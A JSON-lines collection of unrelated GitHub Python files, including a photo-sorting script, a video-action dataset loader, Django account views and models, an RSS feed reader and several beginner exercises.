/Users/abc/Library/Caches/Adobe/Bridge/Cache/v36/data/store\ndb_parent_path = \"\" # ex)bridge:fs:file:///Users/abc/Desktop/230110\ntarget_folder = \"\" # ex) /Users/abc/Desktop/230110\n\n\ndef createFolder(directory):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print('Error: Creating directory. ' + directory)\n\n\ndef connection():\n try:\n con = sqlite3.connect(sql_path)\n return con\n except Error:\n print(Error)\n\n\ndef read_all(con) -> list:\n # read db file and append the tuple ( filename, label ) in db_info\n db_info = []\n cursor_db = con.cursor()\n cursor_db.execute(\n f'SELECT name,label FROM FileSystem_Nodes where label is not null and parentPath=\"{db_parent_path}\"')\n raw_datas = (cursor_db.fetchall())\n for _ in raw_datas:\n db_info.append(_)\n print(db_info)\n return db_info\n\n\ndef move_file(parent_path, file_name):\n try:\n shutil.move(f'{parent_path}/{file_name}', f\"{parent_path}/trash\")\n except (FileNotFoundError, shutil.Error) as e:\n print(e)\n else:\n print(file_name + \" moved to trash\")\n\n\ndef file_classification(file_info: list, parent_path):\n # get db_info by list and judge whether to move the file to trash or not\n\n # we create a trash folder to safely classify the files instead of deleting it\n # exceptions when the trash folder exists must be tempered\n createFolder(f'{parent_path}/trash')\n\n for i in file_info:\n jpg_version_file_name = i[0]\n raw_version_file_name = i[0][:-4] + \".ARW\"\n\n if i[1] == \"leave jpg\":\n move_file(parent_path, raw_version_file_name)\n elif i[1] == \"delete\":\n move_file(parent_path, raw_version_file_name)\n move_file(parent_path, jpg_version_file_name)\n\n\ndef check(con):\n cursor_db = con.cursor()\n cursor_db.execute(\n f'SELECT COUNT(*) FROM FileSystem_Nodes where label=\"Approved\" and parentPath=\"{db_parent_path}\" ')\n approved_file_count = cursor_db.fetchall()\n print(\"Approved files : \" + str(approved_file_count))\n\n cursor_db.execute(\n f'SELECT COUNT(*) FROM FileSystem_Nodes where label=\"leave jpg\" and parentPath=\"{db_parent_path}\" ')\n jpg_only_file_count = cursor_db.fetchall()\n print(\"jpg left files : \" + str(jpg_only_file_count))\n\n orginal_folder_file_list = os.listdir(target_folder)\n orginal_folder_size = len([file for file in orginal_folder_file_list if file.endswith(\".JPG\")])\n print(\"original file count : \" + str(orginal_folder_size))\n\n trash_folder_file_list = os.listdir(target_folder + \"/trash\")\n trash_folder_size = len([file for file in trash_folder_file_list if file.endswith(\".JPG\")])\n print(\"trash_folder count : \" + str(trash_folder_size))\n\n if orginal_folder_size == approved_file_count[0][0] * 2 + jpg_only_file_count[0][0]:\n # originally the check formmula should be but since we labeled the arw files as same as the jpg files the formula should\n # look like above\n print('--------------------------------')\n print(\"NO ERROR\")\n else:\n print(\" ERROR exists \")\n\n\ndef label_arw(con):\n # label arw files as same as the jpg file\n cursor_db = con.cursor()\n cursor_db.execute(\n f'UPDATE FileSystem_Nodes set label = \"Approved\" where sortName in (select REPLACE(sortName, \"JPG\", \"ARW\") as target_arw FROM FileSystem_Nodes where label=\"Approved\" and parentPath=\"{db_parent_path}\") ')\n con.commit()\n\n\ncon = connection()\nlabel_arw(con)\nfile_classification(read_all(con), target_folder)\n\ncheck(con)\n","repo_name":"ahnavocado/Bridge_organizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40220706968","text":"#Exercise 5: Check if the first and last number of a list is the same\n\n#list ac istedhgin sayi adedi for ile acabiliriz.\n#for ile \n#butun elemanlari gecersek son ve bas kiyaslamak icin \n\n\n# =============================================================================\n#Example:\n# # Given list: [10, 20, 30, 40, 10]\n# # result is True\n# \n# # numbers_y = [75, 65, 35, 75, 30]\n# # result is False\n# =============================================================================\n\n\n\ndef firstnlast(c):\n for i in c:\n if c[0] == c[len(c)-1]:\n return \"yes\"\n return \"no\"\n\n\n\nprint(firstnlast([1,43,6,10,1])) ","repo_name":"deni-13/coding-challenges","sub_path":"pynative/basics/basics/1 (6).py","file_name":"1 (6).py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73432349354","text":"from __future__ import print_function\nimport numpy as np\nimport utils.wsad_utils as utils\nimport random\nimport os\nimport options\nimport torch\nimport torchtext \nimport torch.nn as nn\nimport torch.nn.functional as F\n#import gensim\nimport nltk\nimport pickle\ndef get_video_prompt_templates():\n prompts = [\n 'one video of the ', \n ]\n return prompts\n\nclasses = {\n 'BaseballPitch': 'baseball pitch',\n 'BasketballDunk': 'basketball dunk',\n 'Billiards': 'billiards',\n 'CleanAndJerk': 'clean and jerk',\n 'CliffDiving': 'cliff diving',\n 'CricketBowling': 'cricket bowling',\n 'CricketShot': 'cricket shot',\n 'Diving': 'diving',\n 'FrisbeeCatch': 'frisbee catch',\n 'GolfSwing': 'golf swing',\n 'HammerThrow': 'hammer throw',\n 'HighJump': 'high jump',\n 'JavelinThrow': 'javelin throw',\n 'LongJump': 'long jump',\n 'PoleVault': 'pole vault',\n 'Shotput': 'shot put',\n 'SoccerPenalty': 'soccer penalty',\n 'TennisSwing': 'tennis swing',\n 'ThrowDiscus': 'throw discus',\n 'VolleyballSpiking': 'volleyball spiking'\n}\n\nclass SampleDataset:\n def __init__(self, args, mode=\"both\",sampling='random'):\n with open('./vocab/vocab.pkl', 'rb') as fp:\n vocab = pickle.load(fp)\n \n self.vocab = vocab\n self.keep_vocab = dict()\n for w, _ in vocab['counter'].most_common(8000):\n self.keep_vocab[w] = self.vocab_size\n \n self.dataset_name = args.dataset_name\n self.num_class = args.num_class\n self.sampling=sampling\n self.num_segments = args.max_seqlen\n self.feature_size = args.feature_size\n self.path_to_features = os.path.join(\"./Thumos14reduced/Thumos14reduced-I3D-JOINTFeatures.npy\")\n self.path_to_annotations = os.path.join(\"./Thumos14reduced-Annotations/\")\n self.features = np.load(\n self.path_to_features, encoding=\"bytes\", allow_pickle=True\n )\n self.segments = np.load(\n self.path_to_annotations + \"segments.npy\", allow_pickle=True\n )\n self.labels = np.load(\n self.path_to_annotations + \"labels_all.npy\", allow_pickle=True\n )\n # Specific to Thumos14\n\n self._labels = np.load(\n self.path_to_annotations + \"labels.npy\", allow_pickle=True\n )\n self.classlist = np.load(\n self.path_to_annotations + \"classlist.npy\", allow_pickle=True\n )\n self.subset = np.load(\n self.path_to_annotations + \"subset.npy\", allow_pickle=True\n )\n self.videonames = np.load(\n self.path_to_annotations + \"videoname.npy\", allow_pickle=True\n )\n self.batch_size = args.batch_size\n self.len_txt = 20\n self.trainidx = []\n self.testidx = []\n self.classwiseidx = []\n self.currenttestidx = 0\n self.labels_multihot = [\n utils.strlist2multihot(labs, self.classlist)\n for labs in self.labels\n ]\n try:\n ambilist = self.path_to_annotations + \"/Ambiguous_test.txt\"\n ambilist = list(open(ambilist, \"r\"))\n ambilist = [a.strip(\"\\n\").split(\" \")[0] for a in ambilist]\n except:\n ambilist = []\n self.train_test_idx()\n self.classwise_feature_mapping()\n\n self.normalize = False\n self.mode = mode\n if mode == \"rgb\" or mode == \"flow\":\n self.feature_size = 1024\n\n @property\n def vocab_size(self):\n return len(self.keep_vocab) + 1\n \n def train_test_idx(self):\n for i, s in enumerate(self.subset):\n \n if s.decode(\"utf-8\") == \"validation\": # Specific to Thumos14\n \n self.trainidx.append(i)\n #self.testidx.append(i)\n elif s.decode(\"utf-8\") == \"test\":\n self.testidx.append(i)\n\n def classwise_feature_mapping(self):\n for category in self.classlist:\n idx = []\n for i in self.trainidx:\n for label in self.labels[i]:\n if label == category.decode(\"utf-8\"):\n idx.append(i)\n break\n self.classwiseidx.append(idx)\n\n def load_data(self,n_pro=14, n_similar=0, is_training=True, similar_size=2):\n if is_training:\n labels = []\n idx = []\n\n # Load similar pairs\n if n_similar != 0:\n rand_classid = np.random.choice(\n len(self.classwiseidx), size=n_similar\n )\n for rid in rand_classid:\n rand_sampleid = np.random.choice(\n len(self.classwiseidx[rid]),\n size=similar_size,\n replace=False,\n )\n\n for k in rand_sampleid:\n idx.append(self.classwiseidx[rid][k])\n\n # Load rest pairs\n if self.batch_size - similar_size * n_similar < 0:\n self.batch_size = similar_size * n_similar\n\n rand_sampleid = np.random.choice(\n len(self.trainidx),\n size=self.batch_size - similar_size * n_similar,\n )\n\n for r in rand_sampleid:\n idx.append(self.trainidx[r])\n \n feat = []\n words_feat_batch = []\n words_batch = []\n words_len_batch = []\n words_id_batch = []\n words_weight_batch = []\n for i in idx:\n ifeat = self.features[i]\n labs = self.labels[i]\n prompts = get_video_prompt_templates()\n prompt = random.choice(prompts)\n if len(labs) == 3:\n for jdx,lab in enumerate(labs): \n lab_ = classes[lab]\n if jdx == 0:\n pseudo_sent = prompt + lab_ + ','\n elif jdx == 1:\n pseudo_sent += lab_ + 'and'\n else:\n pseudo_sent += lab_ + '.'\n elif len(labs) == 2:\n for jdx,lab in enumerate(labs): \n lab_ = classes[lab]\n if jdx == 0:\n pseudo_sent = prompt + lab_ + 'and'\n elif jdx == 1:\n pseudo_sent += lab_ + '.'\n elif len(labs) == 1:\n for jdx,lab in enumerate(labs): \n lab_ = classes[lab]\n pseudo_sent = prompt + lab_ + '.'\n \n iwords = []\n iweights = []\n \n i_words_feat = np.zeros([n_pro+1,300])\n i_weights = np.zeros([n_pro])\n i_words_id = np.zeros([n_pro])\n for word ,tag in nltk.pos_tag(nltk.tokenize.word_tokenize(pseudo_sent)):\n word = word.lower()\n if word in self.keep_vocab:\n if 'NN' in tag:\n iweights.append(2)\n elif 'VB' in tag:\n iweights.append(2)\n elif 'VJJ' in tag or 'RB' in tag:\n iweights.append(2)\n else:\n iweights.append(1)\n iwords.append(word)\n \n iwords_len = len(iwords)\n i_weights[:iwords_len] = iweights\n iwords_id = [self.keep_vocab[w] for w in iwords]\n i_words_id[:iwords_len] = iwords_id\n \n iwords_feat = [self.vocab['id2vec'][self.vocab['w2id'][iwords[0]]].astype(np.float32)]\n iwords_feat.extend(self.vocab['id2vec'][self.vocab['w2id'][w]].astype(np.float32) for w in iwords)\n iwords_feat = np.asarray(iwords_feat)\n i_words_feat[:iwords_feat.shape[0],:] = iwords_feat\n\n words_feat_batch.append(i_words_feat)\n words_id_batch.append(i_words_id)\n words_weight_batch.append(i_weights)\n words_len_batch.append(iwords_len)\n words_batch.append(iwords)\n \n\n \n if self.sampling == 'random':\n sample_idx = self.random_perturb(ifeat.shape[0])\n elif self.sampling == 'uniform':\n sample_idx = self.uniform_sampling(ifeat.shape[0])\n elif self.sampling == \"all\":\n sample_idx = np.arange(ifeat.shape[0])\n else:\n raise AssertionError('Not supported sampling !')\n ifeat = ifeat[sample_idx]\n feat.append(ifeat)\n \n words_feat_batch = np.array(words_feat_batch)\n words_id_batch = np.array(words_id_batch)\n words_weight_batch = np.array(words_weight_batch)\n words_len_batch = np.array(words_len_batch)\n feat = np.array(feat)\n labels = np.array([self.labels_multihot[i] for i in idx])\n if self.mode == \"rgb\":\n feat = feat[..., : self.feature_size]\n elif self.mode == \"flow\":\n feat = feat[..., self.feature_size :]\n return feat, labels,rand_sampleid,words_batch,words_feat_batch,words_id_batch,words_weight_batch,words_len_batch\n\n else:\n labs = self.labels_multihot[self.testidx[self.currenttestidx]]\n feat = self.features[self.testidx[self.currenttestidx]]\n vn = self.videonames[self.testidx[self.currenttestidx]]\n if self.currenttestidx == len(self.testidx) - 1:\n done = True\n self.currenttestidx = 0\n else:\n done = False\n self.currenttestidx += 1\n feat = np.array(feat)\n if self.mode == \"rgb\":\n feat = feat[..., : self.feature_size]\n elif self.mode == \"flow\":\n feat = feat[..., self.feature_size :]\n return feat, np.array(labs),vn, done\n \n def random_avg(self, x, segm=None):\n if len(x) < self.num_segments:\n ind = self.random_perturb(len(x))\n x_n = x[ind]\n segm = segm[ind] if segm is not None else None\n return x_n, segm\n else:\n inds = np.array_split(np.arange(len(x)), self.num_segments)\n x_n = np.zeros((self.num_segments, x.shape[-1])).astype(x.dtype)\n segm_n = np.zeros(\n (self.num_segments, segm.shape[-1])).astype(x.dtype)\n for i, ind in enumerate(inds):\n x_n[i] = np.mean(x[ind], axis=0)\n if segm is not None:\n segm_n[i] = segm[(ind[0] + ind[-1]) // 2]\n return x_n, segm_n if segm is not None else None\n\n def random_pad(self, x, segm=None):\n length = self.num_segments\n if x.shape[0] > length:\n strt = np.random.randint(0, x.shape[0] - length)\n x_ret = x[strt:strt + length]\n if segm is not None:\n segm = segm[strt:strt + length]\n return x_ret, segm\n elif x.shape[0] == length:\n return x, segm\n else:\n pad_len = length - x.shape[0]\n x_ret = np.pad(x, ((0, pad_len), (0, 0)), mode='constant')\n if segm is not None:\n segm = np.pad(segm, ((0, pad_len), (0, 0)), mode='constant')\n return x_ret, segm\n\n def random_perturb(self, length):\n if self.num_segments == length:\n return np.arange(self.num_segments).astype(int)\n samples = np.arange(self.num_segments) * length / self.num_segments\n for i in range(self.num_segments):\n if i < self.num_segments - 1:\n if int(samples[i]) != int(samples[i + 1]):\n samples[i] = np.random.choice(\n range(int(samples[i]),\n int(samples[i + 1]) + 1))\n else:\n samples[i] = int(samples[i])\n else:\n if int(samples[i]) < length - 1:\n samples[i] = np.random.choice(\n range(int(samples[i]), length))\n else:\n samples[i] = int(samples[i])\n return samples.astype(int)\n\n def uniform_sampling(self, length):\n if self.num_segments == length:\n return np.arange(self.num_segments).astype(int)\n samples = np.arange(self.num_segments) * length / self.num_segments\n samples = np.floor(samples)\n return samples.astype(int)\n\n\nif __name__ == '__main__':\n args = options.parser.parse_args()\n dt = SampleDataset(args)\n features, labels, pairs_id,words_batch,words_feat_batch,words_id_batch,words_weight_batch,words_len_batch = dt.load_data(n_similar=args.num_similar)\n print(features.shape,labels.shape)\n seq_len = np.sum(np.max(np.abs(features), axis=2) > 0, axis=1)\n print(type(seq_len))\n","repo_name":"lgzlIlIlI/Boosting-WTAL","sub_path":"wsad_dataset.py","file_name":"wsad_dataset.py","file_ext":"py","file_size_in_byte":13336,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"} +{"seq_id":"36777703516","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.forms import AuthenticationForm, UserCreationForm\nfrom .forms import CustomUserCreationForm\n\n# Create your views here.\n\ndef signup(request):\n if request.method == 'POST':\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('accounts:login')\n else:\n form = CustomUserCreationForm()\n context = {\n 'form' : form,\n }\n return render(request, 'accounts/signup.html', context)\n\ndef login(reqeust):\n if reqeust.method == 'POST':\n form = AuthenticationForm(reqeust, reqeust.POST)\n if form.is_valid():\n auth_login(reqeust, form.get_user())\n return redirect('todos:index')\n else:\n form = AuthenticationForm()\n context = {\n 'form' : form\n }\n return render(reqeust, 'accounts/login.html', context)\n\ndef logout(request):\n auth_logout(request)\n return redirect('accounts:login')\n","repo_name":"yooooonzzzzzang/Djangoletsgo","sub_path":"1006_workshop/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27405428695","text":"import random\nimport re\n\n_SCRAMBLE_CHARS = '[a-zA-Z]'\n\ndef scramble(s):\n arr = [c for c in s]\n random.shuffle(arr)\n return ''.join(arr)\n\n\ndef word_scramble(word, keep_left=1, keep_right=1):\n if keep_left + keep_right >= len(word):\n return word\n\n left_pos = keep_left\n right_pos = len(word) - keep_right\n\n left = word[0:left_pos]\n mid = scramble(word[left_pos:right_pos])\n right = word[right_pos:]\n\n return left + mid + right\n\n\ndef text_scramble(text, keep_left=1, keep_right=1):\n current = ''\n new_text = ''\n for c in text:\n if re.match(_SCRAMBLE_CHARS, c):\n current += c\n else:\n if current:\n new_text += word_scramble(current, keep_left, keep_right)\n current = ''\n new_text += c\n\n if current:\n new_text += word_scramble(current, keep_left, keep_right)\n\n return new_text\n","repo_name":"aherrman/wordscramble","sub_path":"scrambler.py","file_name":"scrambler.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26873908912","text":"from typing import Any, BinaryIO, Dict, List, Optional, TextIO, Tuple, Type, TypeVar, Union\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nT = TypeVar(\"T\", bound=\"StoreRetailerAppearance\")\n\n\n@attr.s(auto_attribs=True)\nclass StoreRetailerAppearance:\n \"\"\"\n Attributes:\n background_color (Union[Unset, str]):\n image_color (Union[Unset, str]):\n black_theme (Union[Unset, bool]):\n logo_image (Union[Unset, str]):\n side_image (Union[Unset, str]):\n mini_logo_image (Union[Unset, str]):\n \"\"\"\n\n background_color: Union[Unset, str] = UNSET\n image_color: Union[Unset, str] = UNSET\n black_theme: Union[Unset, bool] = UNSET\n logo_image: Union[Unset, str] = UNSET\n side_image: Union[Unset, str] = UNSET\n mini_logo_image: Union[Unset, str] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n background_color = self.background_color\n image_color = self.image_color\n black_theme = self.black_theme\n logo_image = self.logo_image\n side_image = self.side_image\n mini_logo_image = self.mini_logo_image\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if background_color is not UNSET:\n field_dict[\"background_color\"] = background_color\n if image_color is not UNSET:\n field_dict[\"image_color\"] = image_color\n if black_theme is not UNSET:\n field_dict[\"black_theme\"] = black_theme\n if logo_image is not UNSET:\n field_dict[\"logo_image\"] = logo_image\n if side_image is not UNSET:\n field_dict[\"side_image\"] = side_image\n if mini_logo_image is not UNSET:\n field_dict[\"mini_logo_image\"] = mini_logo_image\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n background_color = d.pop(\"background_color\", UNSET)\n\n image_color = d.pop(\"image_color\", UNSET)\n\n black_theme = d.pop(\"black_theme\", UNSET)\n\n logo_image = d.pop(\"logo_image\", UNSET)\n\n side_image = d.pop(\"side_image\", UNSET)\n\n mini_logo_image = d.pop(\"mini_logo_image\", UNSET)\n\n store_retailer_appearance = cls(\n background_color=background_color,\n image_color=image_color,\n black_theme=black_theme,\n logo_image=logo_image,\n side_image=side_image,\n mini_logo_image=mini_logo_image,\n )\n\n store_retailer_appearance.additional_properties = d\n return store_retailer_appearance\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"Nov1kov/sbermarket-api","sub_path":"sbermarket_api/models/store_retailer_appearance.py","file_name":"store_retailer_appearance.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"73236438634","text":"import turtle\r\n\r\n# turtle.color('purple','yellow')\r\n# turtle.bgcolor('black')\r\n\r\n# for i in range(4):\r\n# turtle.right(90)\r\n# turtle.forward(100)\r\n\r\n# for i in range(25):\r\n# turtle.right(15)\r\n# turtle.forward(10)\r\n\r\n# если условие = правда\r\n# действие\r\n\r\n# num1 = int(input('введите число'))\r\n# num2 = int(input('введите число'))\r\n\r\n\r\n\r\n# if num1 != num2:\r\n# print(f'{num1+num2} не равно {num2}')\r\n# elif: type(num1) ==t\r\n# print(f'{num1} не равно {num2}')\r\nwhile True:\r\n s = input('введите фигуру')\r\n\r\n if s == \"squere\":\r\n for i in range(4):\r\n if len(s) > 1:\r\n turtle.right(int(s[3]))\r\n if len(s) > 2:\r\n turtle.forward(int(s[2]))\r\n else:\r\n turtle.right(int(s[1]))\r\n turtle.forward(100)\r\n else:\r\n turtle.right(90)\r\n turtle.forward(100)\r\n elif s[0] ==\"circle\":\r\n for i in range(25):\r\n turtle.right(15)\r\n turtle.forward(10)\r\n else:\r\n break\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ITFriends14/Gregory-Riabikin","sub_path":"Pябікін Григорій/main8.py","file_name":"main8.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11465817467","text":"#!/usr/bin/env python\n\nimport json\nimport numpy as np\nimport pandas as pd\nimport os\nimport sys\nimport glob\n\nimport atomsci.ddm.pipeline.parameter_parser as parse\nfrom atomsci.ddm.pipeline import model_pipeline as mp\nfrom atomsci.ddm.pipeline import predict_from_model as pfm\n\ndef clean():\n \"\"\"\n Clean test files\n \"\"\"\n if \"output\" not in os.listdir():\n os.mkdir(\"output\")\n for f in os.listdir(\"./output\"):\n if os.path.isfile(\"./output/\"+f):\n os.remove(\"./output/\"+f)\n\ndef test():\n \"\"\"\n Test full model pipeline: Curate data, fit model, and predict property for new compounds\n \"\"\"\n\n # Clean\n # -----\n clean()\n\n # Run HyperOpt\n # ------------\n with open(\"H1_RF.json\", \"r\") as f:\n hp_params = json.load(f)\n\n script_dir = parse.__file__.strip(\"parameter_parser.py\").replace(\"/pipeline/\", \"\")\n python_path = sys.executable\n hp_params[\"script_dir\"] = script_dir\n hp_params[\"python_path\"] = python_path\n\n params = parse.wrapper(hp_params)\n if not os.path.isfile(params.dataset_key):\n params.dataset_key = os.path.join(params.script_dir, params.dataset_key)\n\n train_df = pd.read_csv(params.dataset_key)\n\n print(f\"Train a RF models with ECFP\")\n pl = mp.ModelPipeline(params)\n pl.train_model()\n\n print(\"Calculate AD index with the just trained model.\")\n pred_df_mp = pl.predict_on_dataframe(train_df[:10], contains_responses=True, AD_method=\"z_score\")\n\n assert(\"AD_index\" in pred_df_mp.columns.values), 'Error: No AD_index column pred_df_mp'\n\n print(\"Calculate AD index with the saved model tarball file.\")\n pred_df_file = pfm.predict_from_model_file(model_path=pl.params.model_tarball_path,\n input_df=train_df[:10],\n id_col=\"compound_id\",\n smiles_col=\"base_rdkit_smiles\",\n response_col=\"pKi_mean\",\n dont_standardize=True,\n AD_method=\"z_score\")\n assert(\"AD_index\" in pred_df_file.columns.values), 'Error: No AD_index column in pred_df_file'\n\nif __name__ == '__main__':\n test()\n","repo_name":"ATOMScience-org/AMPL","sub_path":"atomsci/ddm/test/integrative/ad_index/test_ad_index.py","file_name":"test_ad_index.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"72"} +{"seq_id":"16042462600","text":"from django.conf.urls import url\n\n\nfrom .src import user_portal, posts, comments, subscriptions, reactions\nfrom . import views\n\nfrom .src.ros_init import Rostrus_Application\n\nRostrus_Application.initialise_application()\n\nurlpatterns = [\n\n url(r'^$', views.index, name='index'),\n url(r'^test/?$', user_portal.views.test, name='test'),\n url(r'^db_test/?$', user_portal.views.db_test, name='db_test'),\n\n\n url(r'^register/?$', user_portal.views.register, name='register'),\n\n url(r'^rostrus_login/?$', user_portal.views.rostrus_login, name='rostrus_login'),\n url(r'^facebook_login/?$', user_portal.views.facebook_login, name='fb_login'),\n\n url(r'^get_portal_prof_img_auth/?$', user_portal.views.get_portal_prof_img_upload_auth, name='get_google_cloud_token'),\n\n url(r'^posts/write_post_type_article?$', posts.views.write_post_type_article, name='insert_article'),\n url(r'^posts/modify_article?$', posts.views.update_article, name='modify_article'),\n url(r'^posts/get_general_post_data?$', posts.views.get_for_you_posts, name='get_general_post_data'),\n url(r'^posts/get_posts_of_tag?$', posts.views.get_posts_sub_tags, name='get_posts_from_sub_tags'),\n url(r'^posts/get_posts_of_portal?$', posts.views.get_posts_sub_portals, name='get_posts_from_sub_portals'),\n url(r'^posts/get_single_post_data?$', posts.views.get_single_post, name='get_single_post'),\n\n url(r'^comments/write_comment?$', comments.views.write_comment, name='insert_comment'),\n url(r'^comments/get_comments?$', comments.views.get_comments, name='get_comment'),\n url(r'^comments/delete_comment?$', comments.views.delete_comment, name='del_comment'),\n\n url(r'^profile/upload_profile_pic_url?$', user_portal.views.update_profile_pic_url, name='update_prof_pic'),\n url(r'^profile/delete_profile_pic?$', user_portal.views.del_profile_pic, name='del_profile_pic'),\n\n url(r'^subscriptions/get_portal_subscriptions?$', subscriptions.views.get_subed_portals, name='get_portal_sub'),\n url(r'^subscriptions/get_tag_subscriptions?$', subscriptions.views.get_portal_sub_tags, name='get_tag_sub'),\n url(r'^subscriptions/subscribe_tag?$', subscriptions.views.sub_tag, name='sub_tag'),\n url(r'^subscriptions/subscribe_portal?$', subscriptions.views.sub_portal, name='sub_portal'),\n\n url(r'^reactions/update_post_reaction?$', reactions.views.post_reaction_update, name='react_post_update'),\n url(r'^reactions/update_comment_reaction?$', reactions.views.comm_reaction_update, name='react_comm_update'),\n\n\n]","repo_name":"BSathvik/RostrusPythonAPI","sub_path":"v1_0/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3917672088","text":"\n# Modules General\nimport re\nimport sys\nimport urllib\nfrom StringIO import StringIO\nfrom traceback import print_exc\n\nimport elementtree.HTMLTreeBuilder as HTB\n\n#modules custom\nfrom utilities import add_pretty_color, set_xbmc_carriage_return, strip_off\n\n\n#FONCTION POUR RECUPERER LES LABELS DE LA LANGUE.\n_ = sys.modules[ \"__main__\" ].__language__\n\n\nclass rssReader:\n \"\"\"\n Class responsable de la recuperation du flux RSS et de l'extraction des infos RSS\n \"\"\"\n def __init__( self, rss_title, rssUrl, titlecolor=\"ffffffff\", textcolor=\"ffffffff\" ):\n self.rss_title = rss_title\n self.titlecolor = titlecolor\n self.textcolor = textcolor\n #self.tags = ( [ \"feed\", \"entry\", \"content\" ], [ \"channel\", \"item\", \"title\" ] )[ ( not \"code.google\" in rssUrl ) ]\n self.tags = ( [ \"feed\", \"entry\", \"title\" ], [ \"channel\", \"item\", \"title\" ] )[ ( not \"code.google\" in rssUrl ) ]\n self.rssPage = self.load_feeds_infos( rssUrl )\n\n def load_feeds_infos( self, url ):\n try:\n html = urllib.urlopen( url )\n if \"code.google\" in url:\n source = html.read()\n parsed = HTB.parse( StringIO( source ), \"utf-8\" ).findall( self.tags[ 1 ] )\n else:\n source = re.sub( \"\", \"\", html.read() )\n parsed = HTB.parse( StringIO( source ), \"utf-8\" ).findall( self.tags[ 0 ] )[ 0 ].findall( self.tags[ 1 ] )\n html.close()\n return parsed\n except:\n print_exc()\n # si on arrive ici le retour est automatiquement None\n\n def GetRssInfo( self ):\n try:\n if self.rssPage is None: raise\n items_listed = self.rssPage[ :10 ]\n if not self.rss_title: maintitle = _( 107 )\n else: maintitle = self.rss_title\n items = add_pretty_color( maintitle + \": \", color=self.titlecolor )\n item_sep = add_pretty_color( \" - \", color=self.textcolor )\n item_end = len( items_listed )\n for count, item in enumerate( items_listed ):\n try:\n items += item.findtext( self.tags[ 2 ] ).replace( u'\\xa0', \" \" )\n except:\n print_exc()\n continue\n if ( ( count + 1 ) < item_end ):\n items += item_sep\n\n if self.tags[ 1 ] == \"entry\":\n items = strip_off( set_xbmc_carriage_return( items ).replace( \"[CR]\", \" \" ) )\n return maintitle, items.replace( \""\", '\"' ).replace( \"'\", \"'\" )\n except:\n print_exc()\n return \"\", ( add_pretty_color( _( 107 ), color=self.titlecolor ) + _( 108 ) )\n\n","repo_name":"tcowans/passion-xbmc","sub_path":"scripts/Installer Passion-XBMC/resources/libs/RSSParser.py","file_name":"RSSParser.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"44354715195","text":"from django.db import models\n\ndef get_amount_field():\n return models.DecimalField(default=0, max_digits=16, decimal_places=8)\n\nclass Account(models.Model):\n username = models.CharField(max_length=30, unique=True)\n password = models.CharField(max_length=60)\n email = models.TextField(blank=True, null=True) # stored encrypted\n created = models.DateTimeField(auto_now_add=True)\n allow_auth = models.BooleanField(default=True)\n allow_orders = models.BooleanField(default=True)\n allow_transfers = models.BooleanField(default=True)\n deposit_address = models.CharField(max_length=40, blank=True, null=True)\n deposit_ref = models.CharField(max_length=30, blank=True, null=True)\n commission_rate = models.DecimalField(max_digits=5, decimal_places=4)\n\n def __str__(self):\n return self.username\n\nclass Currency(models.Model):\n name = models.CharField(max_length=40, unique=True)\n code = models.CharField(max_length=4, unique=True)\n symbol = models.CharField(max_length=1, blank=True, null=True)\n\n def __str__(self):\n return self.code\n\nclass Balance(models.Model):\n account = models.ForeignKey(Account, related_name='balances')\n currency = models.ForeignKey(Currency, related_name='balances')\n amount = get_amount_field()\n last_updated = models.DateTimeField(auto_now=True)\n\n class Meta:\n unique_together = (('account', 'currency'),)\n\n def __str__(self):\n return \"%s has %s %s\" % (self.account, self.amount, self.currency)\n\nclass Order(models.Model):\n balance = models.ForeignKey(Balance, related_name='orders')\n offer_amount = get_amount_field()\n initial_offer_amount = get_amount_field()\n want_currency = models.ForeignKey(Currency, related_name='orderbook')\n want_amount = get_amount_field()\n initial_want_amount = get_amount_field()\n bid = get_amount_field()\n ask = get_amount_field() # should probably use a Manager for this?\n filled = models.BooleanField(default=False)\n cancelled = models.BooleanField(default=False)\n last_updated = models.DateTimeField(auto_now=True)\n placed = models.DateTimeField(auto_now_add=True)\n ip_address = models.IPAddressField()\n\n def __str__(self):\n if self.filled or 